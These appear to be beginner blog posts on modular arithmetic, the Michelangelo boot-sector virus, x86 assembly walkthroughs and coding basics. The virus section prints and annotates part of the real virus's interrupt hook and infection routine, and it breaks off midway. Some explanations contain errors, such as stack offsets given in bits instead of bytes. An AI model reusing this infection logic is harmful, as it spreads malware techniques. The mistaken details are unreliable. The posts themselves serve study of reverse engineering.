Congruence is similar (but NOT the same) to equivalence. A lot of modular operations operate under the condition of congruence instead of equivalence because of the nature of modular math (multiple numbers can produce the same answer).
The general formula to determine congruence is:
a - b = k*m
In layman's terms, if the difference between a and b in the equation
a = b mod(m) is divisible by m, then the expression is congruent.
This is mainly used in cryptography, which is useful to learn for reverse engineering or pentesting. All the guides I found were either too simple and lacking information, or way too in depth and difficult to understand.
What is Modular Arithmetic?
Modular Arithmetic is a field of study revolving around remainders. It's main operand is the modulo, which returns the remainder of a division operation (3mod4 = 3, 4mod2 = 0, 5mod2 = 1... etc.)
Why should I care?
I initially doubted the application of this field, thinking it was just something advanced to obscure information. Surprisingly, this math has a lot of uses, particularly Chinese Remainder Theorem for those who code programs but aren't in the cryptography field. Its main application is working with numbers that are too big to be worked with otherwise, unless you used quantum computing or some other nonsense.
This seems really hard...
I'm right there with you, it's annoyingly hard to learn. But once you get it, you may be surprised how it can help you!
This guide is for people who want a concise explanation and relevant examples for these concepts. It's a bold claim, but it's mainly for me anyways. Welcome to the Modular Arithmetic journey *dances*
The Michelangelo virus is a variant of another popular virus, with this one being named because the virus would remain dormant until March 6, the date of Michelangelo's birthday. It was created in 1991, although its reign of terror only lasted til about 1997.
How it works:
The computers in this era ran on the MS-DOS (Microsoft Disk Operating Service) OS, and memory was not protected in any way, meaning you could access any part of memory with any program at any time. Very secure.
Michelangelo originated on a floppy disk. Back then, floppy disks had higher priority for booting than the hard drive when the computer was still starting up, probably to enable custom OS systems.
The way Michelangelo worked: The disk reader would find it and use it to boot instead of the MBR (Master Boot Record). It would go into memory where the MBR would usually go, then copy the MBR into sector 3 of its own floppy disk.
It would then fiddle with the Disk Reader so it reads from a different spot in memory, then make a copy of itself there. It would copy over its original version in memory with the real MBR, then grab a little off the end to get some verification information. It would then place an MBR copy into the hard drive in sector 7, then write itself over the original MBR in the hard drive. It would continue this for any media placed inside the computer.
While this was a harmful virus, its date restriction meant you could just turn off your computer for a day or modify the day the computer read to avoid it.
This one is tricky, as a very old virus that takes advantage of bootloading in old computers. For some background, I've made a quick post covering its operations.
Onto the actual code:
push ds
pushes the current data segment register onto the stack
push ax
pushes the ax register onto the stack
or dl, dl
this one is tricky. if you look one ahead you’ll see a jnz check, so this is a weird way to set the ZF flag if data lower is 0. dl in this case stores the boot drive unit, which when set to 0x00 represents a floppy to boot.
jnz short Exit_Int13h
if the zero flag is not set, jump to the nearby Exit_Int13h section
xor ax, ax
zeroes out the ax register
mov ds, ax
zeroes out the ds register with ax. this ensures it can receive the next instructions.
test byte ptr ds: 43Fh, 1
this is a logical and, but unlike the and instruction it doesn’t store the result, just changes the relevant flags. 43Fh is the drive motor status, which when set to 1 indicates that the disk A drive motor is running.
jnz short Exit_Int13h
if the drive motor is running, jump to nearby Exit_Int13h
pop ax
pop old ax from the stack
pop ds
pop old ds from the stack
pushf
pushes current flag register onto the stack
call dword ptr cs: 0Ah
calls original int13h
pushf
pushes flag register to the stack again
call Infect
calls a virus function
popf
pops flags off the register
Exit_int13h
These instruction just reset to prepare for the next section
pop ax
pop ds
jmp dword ptr cs: 0Ah
calls old int13h
Infect:
proc near
marks start of procedure called Infect
push ax
push bx
push cx
push dx
push ds
push es
push si
push di
push cs
pushes cs, or current segment, onto stack
pop ds
pops ds off of stack, setting it to the current segment
push cs
pushes cs onto stack again
pop es
pops es off of stack, setting it to the current segment
mov si, 4
try to read disk up to 4 times
ReadBoot:
mov ax, 201h
prepares to read one sector
mov bx, 200h
destination is 512 bytes beyond virus code
mov cx, 1
read track 0, sector 1 (MBR)
xor dx, dx
set the head and drive number to 0
pushf
pushes flags onto stack to save state
call dword ptr ds: 0Ah
read sectors into memory by calling int13h vector
jnb short ReadSuccess
Disk was successfully read
xor ax, ax
zero out ax
pushf
push flags onto stack
call dword ptr ds: 0Ah
reset disk
dec si
adjust counter
jnz short ReadBoot
try and read disk again
jmp short Escape
couldn't read disk, leave
ReadSuccess:
xor si, si
zero out si to prep for word load in
cld
clears the direction flag, making the direction lower to higher (increments si and di upon str operations)
lodsw
loads word at ds: 0
cmp ax, [bx]
check if infected already by comparing first four bytes of code with first four bytes of boot sector
This is a line by line explanation of a hello world code translated to assembly.
This was the original file, written in C:
So as you can see, this function takes in two arguments, a number argc and a character array argv []. It then uses a conditional to test if argc is equal to 2.
If the answer is yes, it will print "Hello argv[1]", with argv[1] in this case rendering as the second character in the char array. The %s does this, while the \n is just a newline.
Regardless of the result of the argc comparison, the function will return 0.
This is what the assembly code for this C file looks like:
It's significantly longer than its sibling in C. Let's go through it line-by-line:
- .file "hello.c"
this is just the c file with the source code
-.intel_syntax noprefix
the gnu assembler defaults to at&t syntax, so intel_syntax noprefix must be used to alert compiler to use intel syntax
-.text
.text creates new section for __main function stuff
- .def __main
this is just info for the assembler
- .section .rdata,"dr"
creates a new section called .rdata that contains data to be read
.LC0:
-.ascii "Hello %s\12\0"
this is the string to be printed: \12 specifies a new line, \0 is a null character used at the end of all strings
-.text
new section for main function stuff
- .globl main
asserts main as a function that can be used by other parts of the program, the linker here since main is used as a subroutine in the source code
-.def main
more info for the assembler
main:
below is the start of what is called the function prologue
-push rbp
puts rbp, the base pointer that points to the current memory address, on the stack, saving its current value
-mov rbp, rsp
moves rbp to rsp, which is the current bottom of the stack
-sub rsp, 32
moves rsp down to make space on the stack, this is where the prologue ends
-mov DWORD PTR 16[rbp], ecx
moves the parameter argc as a double word (4 bytes) from the count register to the stack, 16 bits above rbp
-mov QWORD PTR 24[rbp], rdx
moves the parameter argv[] as a quad word (8 bytes) from the data register to the stack, 24 bits above rbp
-call __main
funnily enough __main is a function called in most assembly files to start the actual program: eveything before this has just been prepwork
-cmp DWORD PTR 16[rbp], 2
compares argc to 2 for the if statement
-jne .L2
if argc does not equal 2, jump to the .L2 section
-mov rax, QWORD PTR 24[rbp]
puts the char pointer into the rax register
-add rax, 8
adds 8 to the char pointer, moving it from the first character address to the second character address
-mov rax, QWORD PTR [rax]
stores the second character in rax using the address previously calculated
-mov rdx, rax
moves the character in rax to rdx, the data register
-lea rcx, .LC0[rip]
This grabs the address of the string from earlier. It does this by calling the address of the instruction pointer and modifying it by the address at .LC0
-call printf
This calls the printf function, which is stored in the C library
.L2:
This is where the function exits
-mov eax, 0
Moves the return value 0 into eax
-leave
Basically a reset, copies rbp into rsp, then pops the rbp on the stack into the rbp register. This is a good example of a compound instruction.
-ret
Just the return call, pops instruction pointer out of the stack to return to original function
- .ident "GCC: (x86_64-posix-seh-rev0, Built by MinGW-W64 project) 8.1.0"
Basically the compiler getting some free advertising
If you didn't want to learn all of those languages and are lazy (like me) I'll give a brief overview of coding. Since people here like wizards, that will be my primary analogy.
So as a wizard, you have spells to cast, and it is likely you have multiple schools or types of magic to choose from. For this particular magic, the main types are as follows:
Conditionals
Loops
Functions
In a similar vein, most of these types have core components that are used to make them. These are commonly referred to as variables, and they come in a few flavors:
Number (int)
Letter (char)
Word/Phrase (string)
Object
List
I will go over each type and component below.
Conditionals
Conditionals are very simple. The spell comes in this form:
if (condition is true) {make this thing happen}
else {make this thing happen}
For example:
if (apple = red) {bite apple}
else {throw apple away}
This is often used as an evaluation to ensure a certain thing has been done or goal has been met before performing an action.
Loops
Loops are used to repeat an action multiple times. This is often useful for something that contains multiple items to be evaluated, like a grocery list. There are two main types of loops:
For loop: This will loop for a set number of times. So if you have 5 items on your grocery list, a for loop would loop over the list 5 times.
While loop: This will loop until something triggers an exit. For instance looking through a dictionary until you find a particular word.
Functions
Functions essentially perform any action. Conditionals and loops are often used inside functions.
They follow this template:
functionName(inputs (optional)):
perform action
return output (optional)
A good example of a function is one that changes an apples color.
changeApple(apple, color) :
apple.color = color
return apple
So this function takes in an apple and a color, then returns the apple with its color changed. But where does it return to? Most times it is stored within a component.
Components
For some languages you are required to define a components type, for some you are not. Most component types are rather self explanatory, and when they are not Google is your best friend.
So you want to learn reverse engineering but aren’t familiar with code. For anyone not familiar with reverse engineering, it mainly has application in cybersecurity.
In the business there are a few main languages that you should probably at least be familiar with, among those being:
Python
HTML/CSS
C
Assembly is also recommended, though if you know C you should be able to keep up. For those unfamiliar, I'll provide some resources and a brief overview below.
Python
CodeAcademy is a good free source for learning coding. The python specific course is here.
I would always recommend at least having the documentation on hand for a relevant language. The python documentation is listed here.
HTML/CSS
CodeAcademy also has a great course for this here.
Documentation can be found here.
C
C is one of the most difficult languages for a beginner to learn. There's a good YouTube video to start you out here.
I would highly recommend trying coding challenges to get more comfortable with this language, like the ones here.
Reverse engineering requires a very solid grasp on all of these languages. That being said. Most experts in this language may not even be aware of some of the tactics used for this profession. It is a lot like a puzzle, and even Professors with PHDs in this subject google things a lot.
So, if you didn't want to learn all of those languages and are lazy (like me) Here is a brief overview of code just to give you some kind of foundation.